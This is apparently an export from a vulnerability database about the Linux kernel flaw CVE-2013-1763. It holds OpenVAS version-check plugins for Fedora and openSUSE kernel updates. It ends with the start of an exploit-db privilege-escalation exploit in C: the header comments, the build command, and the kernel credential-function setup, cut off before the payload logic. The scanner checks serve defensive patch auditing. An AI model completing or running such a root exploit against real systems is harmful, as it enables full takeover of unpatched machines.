"2013-03-01T00:00:00", "id": "OPENVAS:865399", "href": "http://plugins.openvas.org/nasl.php?oid=865399", "type": "openvas", "title": "Fedora Update for kernel FEDORA-2013-3086", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for kernel FEDORA-2013-3086\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\ntag_affected = \"kernel on Fedora 18\";\ntag_insight = \"The kernel package contains the Linux kernel (vmlinuz), the core of any\n Linux operating system. The kernel handles the basic functions\n of the operating system: memory allocation, process allocation, device\n input and output, etc.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2013-February/099325.html\");\n script_id(865399);\n script_version(\"$Revision: 8466 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-19 07:58:30 +0100 (Fri, 19 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-03-01 11:08:10 +0530 (Fri, 01 Mar 2013)\");\n script_cve_id(\"CVE-2013-1763\", \"CVE-2013-0290\", \"CVE-2013-0228\", \"CVE-2013-0190\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2013-3086\");\n script_name(\"Fedora Update for kernel FEDORA-2013-3086\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of kernel\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC18\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~3.7.9~205.fc18\", rls:\"FC18\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:38:24", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-0228", "CVE-2013-0190", "CVE-2013-1763", "CVE-2013-0290"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2013-03-01T00:00:00", "id": "OPENVAS:1361412562310865399", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310865399", "type": "openvas", "title": "Fedora Update for kernel FEDORA-2013-3086", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for kernel FEDORA-2013-3086\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2013-February/099325.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.865399\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-03-01 11:08:10 +0530 (Fri, 01 Mar 2013)\");\n script_cve_id(\"CVE-2013-1763\", \"CVE-2013-0290\", \"CVE-2013-0228\", \"CVE-2013-0190\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"FEDORA\", value:\"2013-3086\");\n script_name(\"Fedora Update for kernel FEDORA-2013-3086\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC18\");\n script_tag(name:\"affected\", value:\"kernel on Fedora 18\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC18\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~3.7.9~205.fc18\", rls:\"FC18\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-01-22T13:09:51", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1767", "CVE-2013-0228", "CVE-2013-0190", "CVE-2013-1763", "CVE-2013-0290"], "description": "Check for the Version of kernel", "modified": "2018-01-22T00:00:00", "published": "2013-03-05T00:00:00", "id": "OPENVAS:865401", "href": "http://plugins.openvas.org/nasl.php?oid=865401", "type": "openvas", "title": "Fedora Update for kernel FEDORA-2013-3223", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for kernel FEDORA-2013-3223\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\ntag_affected = \"kernel on Fedora 18\";\ntag_insight = \"The kernel package contains the Linux kernel (vmlinuz), the core of any\n Linux operating system. The kernel handles the basic functions\n of the operating system: memory allocation, process allocation, device\n input and output, etc.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2013-March/099471.html\");\n script_id(865401);\n script_version(\"$Revision: 8483 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-22 07:58:04 +0100 (Mon, 22 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-03-05 09:39:06 +0530 (Tue, 05 Mar 2013)\");\n script_cve_id(\"CVE-2013-1767\", \"CVE-2013-1763\", \"CVE-2013-0290\", \"CVE-2013-0228\", \"CVE-2013-0190\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2013-3223\");\n script_name(\"Fedora Update for kernel FEDORA-2013-3223\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of kernel\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC18\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~3.8.1~201.fc18\", rls:\"FC18\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-26T11:09:34", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-0160", "CVE-2013-1763", "CVE-2013-0231", "CVE-2013-0216", "CVE-2012-5374"], "description": "Check for the Version of kernel", "modified": "2018-01-25T00:00:00", "published": "2013-03-11T00:00:00", "id": "OPENVAS:850425", "href": "http://plugins.openvas.org/nasl.php?oid=850425", "type": "openvas", "title": "SuSE Update for kernel openSUSE-SU-2013:0395-1 (kernel)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_suse_2013_0395_1.nasl 8526 2018-01-25 06:57:37Z teissa $\n#\n# SuSE Update for kernel openSUSE-SU-2013:0395-1 (kernel)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The Linux kernel was updated to 3.4.33 and to fix a local\n root privilege escalation and various other security and\n non-security bugs.\n\n CVE-2013-1763: A out of bounds access in sock_diag could be\n used by local attackers to execute code in kernel context\n and so become root.\n\n CVE-2013-0160: The atime of /dev/ptmx is no longer updated,\n avoiding side channel attacks via user typing speed.\n\n CVE-2012-5374: Denial of service via btrfs hashes could\n have been used by local attackers to cause a compute denial\n of service.\n\n CVE-2013-0216: Fixed a problem in XEN netback: shutdown the\n ring if it contains garbage.\n\n CVE-2013-0231: Fixed a problem in XEN pciback: rate limit\n error messages from xen_pcibk_enable_msi(x).\";\n\n\ntag_affected = \"kernel on openSUSE 12.2\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.opensuse.org/opensuse-security-announce/2013-03/msg00004.html\");\n script_id(850425);\n script_version(\"$Revision: 8526 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-25 07:57:37 +0100 (Thu, 25 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-03-11 18:29:24 +0530 (Mon, 11 Mar 2013)\");\n script_cve_id(\"CVE-2012-5374\", \"CVE-2013-0160\", \"CVE-2013-0216\", \"CVE-2013-0231\",\n \"CVE-2013-1763\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"openSUSE-SU\", value: \"2013:0395_1\");\n script_name(\"SuSE Update for kernel openSUSE-SU-2013:0395-1 (kernel)\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of kernel\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"openSUSE12.2\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel-default\", rpm:\"kernel-default~3.4.33~2.24.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-default-base\", rpm:\"kernel-default-base~3.4.33~2.24.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-default-base-debuginfo\", rpm:\"kernel-default-base-debuginfo~3.4.33~2.24.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-default-debuginfo\", rpm:\"kernel-default-debuginfo~3.4.33~2.24.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-default-debugsource\", rpm:\"kernel-default-debugsource~3.4.33~2.24.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-default-devel\", rpm:\"kernel-default-devel~3.4.33~2.24.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-default-devel-debuginfo\", rpm:\"kernel-default-devel-debuginfo~3.4.33~2.24.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-syms\", rpm:\"kernel-syms~3.4.33~2.24.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~3.4.33~2.24.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-base\", rpm:\"kernel-debug-base~3.4.33~2.24.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-base-debuginfo\", rpm:\"kernel-debug-base-debuginfo~3.4.33~2.24.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-debuginfo\", rpm:\"kernel-debug-debuginfo~3.4.33~2.24.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-debugsource\", rpm:\"kernel-debug-debugsource~3.4.33~2.24.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~3.4.33~2.24.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-devel-debuginfo\", rpm:\"kernel-debug-devel-debuginfo~3.4.33~2.24.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-desktop\", rpm:\"kernel-desktop~3.4.33~2.24.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-desktop-base\", rpm:\"kernel-desktop-base~3.4.33~2.24.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-desktop-base-debuginfo\", rpm:\"kernel-desktop-base-debuginfo~3.4.33~2.24.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-desktop-debuginfo\", rpm:\"kernel-desktop-debuginfo~3.4.33~2.24.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-desktop-debugsource\", rpm:\"kernel-desktop-debugsource~3.4.33~2.24.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-desktop-devel\", rpm:\"kernel-desktop-devel~3.4.33~2.24.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-desktop-devel-debuginfo\", rpm:\"kernel-desktop-devel-debuginfo~3.4.33~2.24.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-ec2\", rpm:\"kernel-ec2~3.4.33~2.24.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-ec2-base\", rpm:\"kernel-ec2-base~3.4.33~2.24.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-ec2-base-debuginfo\", rpm:\"kernel-ec2-base-debuginfo~3.4.33~2.24.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-ec2-debuginfo\", rpm:\"kernel-ec2-debuginfo~3.4.33~2.24.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-ec2-debugsource\", rpm:\"kernel-ec2-debugsource~3.4.33~2.24.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-ec2-devel\", rpm:\"kernel-ec2-devel~3.4.33~2.24.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-ec2-devel-debuginfo\", rpm:\"kernel-ec2-devel-debuginfo~3.4.33~2.24.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-ec2-extra\", rpm:\"kernel-ec2-extra~3.4.33~2.24.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-ec2-extra-debuginfo\", rpm:\"kernel-ec2-extra-debuginfo~3.4.33~2.24.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-trace\", rpm:\"kernel-trace~3.4.33~2.24.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-trace-base\", rpm:\"kernel-trace-base~3.4.33~2.24.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-trace-base-debuginfo\", rpm:\"kernel-trace-base-debuginfo~3.4.33~2.24.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-trace-debuginfo\", rpm:\"kernel-trace-debuginfo~3.4.33~2.24.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-trace-debugsource\", rpm:\"kernel-trace-debugsource~3.4.33~2.24.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-trace-devel\", rpm:\"kernel-trace-devel~3.4.33~2.24.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-trace-devel-debuginfo\", rpm:\"kernel-trace-devel-debuginfo~3.4.33~2.24.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-vanilla\", rpm:\"kernel-vanilla~3.4.33~2.24.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-vanilla-debuginfo\", rpm:\"kernel-vanilla-debuginfo~3.4.33~2.24.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-vanilla-debugsource\", rpm:\"kernel-vanilla-debugsource~3.4.33~2.24.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-vanilla-devel\", rpm:\"kernel-vanilla-devel~3.4.33~2.24.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-vanilla-devel-debuginfo\", rpm:\"kernel-vanilla-devel-debuginfo~3.4.33~2.24.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen\", rpm:\"kernel-xen~3.4.33~2.24.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen-base\", rpm:\"kernel-xen-base~3.4.33~2.24.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen-base-debuginfo\", rpm:\"kernel-xen-base-debuginfo~3.4.33~2.24.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen-debuginfo\", rpm:\"kernel-xen-debuginfo~3.4.33~2.24.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen-debugsource\", rpm:\"kernel-xen-debugsource~3.4.33~2.24.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen-devel\", rpm:\"kernel-xen-devel~3.4.33~2.24.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen-devel-debuginfo\", rpm:\"kernel-xen-devel-debuginfo~3.4.33~2.24.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~3.4.33~2.24.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-docs\", rpm:\"kernel-docs~3.4.33~2.24.2\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-source\", rpm:\"kernel-source~3.4.33~2.24.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-source-vanilla\", rpm:\"kernel-source-vanilla~3.4.33~2.24.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-pae\", rpm:\"kernel-pae~3.4.33~2.24.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-pae-base\", rpm:\"kernel-pae-base~3.4.33~2.24.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-pae-base-debuginfo\", rpm:\"kernel-pae-base-debuginfo~3.4.33~2.24.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-pae-debuginfo\", rpm:\"kernel-pae-debuginfo~3.4.33~2.24.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-pae-debugsource\", rpm:\"kernel-pae-debugsource~3.4.33~2.24.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-pae-devel\", rpm:\"kernel-pae-devel~3.4.33~2.24.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-pae-devel-debuginfo\", rpm:\"kernel-pae-devel-debuginfo~3.4.33~2.24.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2018-05-24T14:08:10", "description": "Linux Kernel < 3.5.0-23 (Ubuntu 12.04.2 x64) - 'SOCK_DIAG' SMEP Bypass Local Privilege Escalation. CVE-2013-1763. Local exploit for Linux platform", "published": "2015-08-26T00:00:00", "type": "exploitdb", "title": "Linux Kernel < 3.5.0-23 (Ubuntu 12.04.2 x64) - 'SOCK_DIAG' SMEP Bypass Local Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-1763"], "modified": "2015-08-26T00:00:00", "id": "EDB-ID:44299", "href": "https://www.exploit-db.com/exploits/44299/", "sourceData": "/** \r\n * based on the exploit by SynQ\r\n *\r\n * Modified PoC for CVE-2013-1763 with SMEP bypass\r\n * Presentation: Practical SMEP Bypass Techniques on Linux\r\n * Vitaly Nikolenko\r\n * vnik@cyseclabs.com\r\n * \r\n * Target: Linux ubuntu 3.5.0-23-generic #35~precise1-Ubuntu SMP Fri Jan 25 17:13:26 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux\r\n *\r\n * gcc sockdiag_smep.c -O2 -o pwn \r\n */\r\n\r\n/**\r\n EDB Note: Video ~ https://youtu.be/jHJd-5NvWlQ\r\n**/\r\n\r\n#include <unistd.h>\r\n#include <sys/socket.h>\r\n#include <netinet/tcp.h>\r\n#include <errno.h>\r\n#include <linux/if.h>\r\n#include <linux/filter.h>\r\n#include <string.h>\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <linux/inet_diag.h>\r\n#include <sys/mman.h>\r\n#include <assert.h>\r\n//#include <linux/sock_diag.h>\r\n//#include <linux/unix_diag.h>\r\n//#include <linux/netlink.h>\r\n#include \"sock_diag.h\"\r\n#include \"unix_diag.h\"\r\n#include \"netlink.h\"\r\n\r\nunsigned long user_cs;\r\nunsigned long user_ss;\r\nunsigned long user_rflags;\r\n\r\ntypedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);\r\ntypedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);\r\n_commit_creds commit_creds;\r\n_prepare_kernel_cred prepare_kernel_cred;\r\nunsigned long sock_diag_handlers, nl_table;\r\n\r\nstatic void 